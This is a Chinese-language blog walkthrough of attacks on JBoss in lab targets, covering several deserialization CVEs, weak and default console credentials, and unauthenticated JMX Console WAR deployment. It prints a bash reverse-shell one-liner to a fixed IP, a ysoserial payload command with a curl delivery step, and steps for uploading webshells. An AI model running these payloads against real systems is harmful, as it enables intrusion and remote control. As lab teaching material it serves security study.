当前位置: 首页 > article >正文

常见中间件漏洞攻略-Jboss篇

一、CVE-2015-7501-Jboss JMXInvokerServlet 反序列化漏洞

第一步:开启靶场

第二步:访问该接口,发现直接下载,说明接⼝开放,此接⼝存在反序列化漏洞

http://47.103.81.25:8080/invoker/JMXInvokerServlet
第三步:准备ysoserial⼯具进⾏漏洞利⽤,将反弹shell进⾏base64编码

#反弹shell
bash -i >& /dev/tcp/47.103.81.25/8888 0>&1

#64base编码
YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx

#命令使用工具生成恶意文件
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMDMuODEuMjUvODg4OCAwPiYx}|{base64,-d}|{bash,-i} ">exp.ser
第四步:服务器开启监听,终端执行命令,成功反弹shell

#执行命令
curl http://47.103.81.25:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

二、CVE-2017-7504-JBossMQ JMS 反序列化漏洞

第一步:开启靶场

第二步:访问漏洞靶场

#漏洞靶场
http://47.103.81.25:8080/jbossmq-httpil/HTTPServerILServlet
第三步:准备jexboss工具包,geshell

#运行工具,getshell
python3 jexboss.py -u http://47.103.81.25:8080

三、CVE-2017-12149-JBoss 5.x/6.x反序列化漏洞

第一步:开启靶场

第二步:验证是否存在漏洞

#漏洞存在地址
http://47.103.81.25:8080/invoker/readonly

#响应码500 --- 服务器内部错误,无法完成请求 --- 说明⻚⾯存在,此⻚⾯存在反序列化漏洞
#服务器将⽤户post请求内容进⾏反序列化
第三步:使⽤⼯具进⾏检测 DeserializeExploit 如果成功直接上传webshell

四、Administration Console弱⼝令

第一步:登陆后台

#后台地址
http://47.103.81.25:8080/admin-console/login.seam

#用户名密码
admin:vulhub
第二步:点击web应用,上传后门文件shell.war

第三步:连接webshell

#shell.jsp地址
http://47.103.81.25:8080/shell/shell.jsp

五、低版本JMX Console未授权

第一步:开启靶场

#URL
http://47.103.81.25:8080/jmx-console/

#用户名密码
admin:amdin
第二步:准备通过URL的⽅式远程部署war包

第三步:将后门文件war包上传至云服务器,并测试能否顺利访问到

第四步:填写war包地址,点击invoke跳转

第五步:连接webshell
#URL
http://47.103.81.25:8080/shell/shell.jsp	w

六、高版本JMX Console未授权

第一步:开启靶场

#URL
http://47.103.81.25:8080/jmx-console/
第二步:准备通过URL的⽅式远程部署war包cmd.war

第三步:连接webshell

#URL
http://47.103.81.25:8080/cmd/shell.jsp

                                                                                                                                FROM  IYU_ 


http://www.kler.cn/a/598584.html

相关文章:

  • 社群输出价值重构:AI技术驱动的持续内容生产体系研究
  • 蓝桥杯单片机刷题——串口发送显示
  • Java设计模式之备忘录模式
  • Linux 常用命令 - last 【显示历史登录用户列表】
  • 使用Docker运行 Ollama本地部署 DeepSeek 模型并用Dify实现可视化操作
  • Centos7搭建Zabbix4.x监控HCL模拟网络设备:zabbix-server搭建及监控基础03
  • 音视频学习(三十):fmp4
  • Shell正则表达式
  • fastapi+playwright爬取google搜索1-3页的关键词返回json
  • 《Solidity智能合约开发:从零到一实战指南》大纲
  • SpringBoot 第三课(Ⅰ) 数据层开发
  • Simple-BEV的bilinear_sample 作为view_transformer的解析,核心是3D-2D关联点生成
  • 8、undo log
  • 使用HAI来打通DeepSeek的任督二脉
  • 我的uniapp自定义模板
  • 基于AT89C52单片机的智能家居安全监控系统设计
  • 【RabbitMQ】RabbitMQ消息的重复消费问题如何解决?
  • 编译安装redis,systemtcl配置redis自启动,系统并发调优
  • IMX8MP Android 10系统编译SDK
  • elasticsearch+sentencetransformer检索样例